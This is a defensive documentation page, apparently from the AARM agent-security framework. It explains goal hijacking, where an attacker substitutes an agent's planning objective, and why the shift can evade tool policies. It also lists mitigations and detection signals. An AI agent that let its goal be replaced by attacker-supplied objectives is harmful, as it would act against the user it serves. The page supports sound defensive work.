Documentation Index
Fetch the complete documentation index at: https://aarm.dev/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Goal hijacking occurs when an agent’s working objective changes from the user’s task to an attacker-controlled or otherwise illegitimate objective. Unlike prompt injection, which often focuses on a specific instruction, goal hijacking changes the planning target itself.Example
Why It Is Dangerous
- downstream actions can still look coherent
- ordinary tool policies may not catch the shift immediately
- the agent may re-plan multiple steps around the hijacked goal
AARM Mitigations
Original-intent binding
Keep the original request available as an invariant reference for later evaluation.Semantic distance checks
Compare current action purpose against the initial task or declared workflow goal.Scope boundaries
Restrict action families that do not fit the authorized task type.Detection Signals
| Signal | Indicates |
|---|---|
| Sudden tool-family change | Planning objective may have shifted |
| New objective language in agent state | Agent is rephrasing the goal in attacker terms |
| Rising semantic distance | Current actions no longer align with the original request |
| Resource access outside declared task | Goal expansion or replacement |
Key Takeaway
Goal hijacking is about objective substitution. AARM mitigates it by treating original task alignment as a runtime security boundary, not a prompt-engineering convenience.
Next
Intent Drift
How benign-looking reasoning can still diverge over time
Context Accumulator
How to preserve the original task for later comparison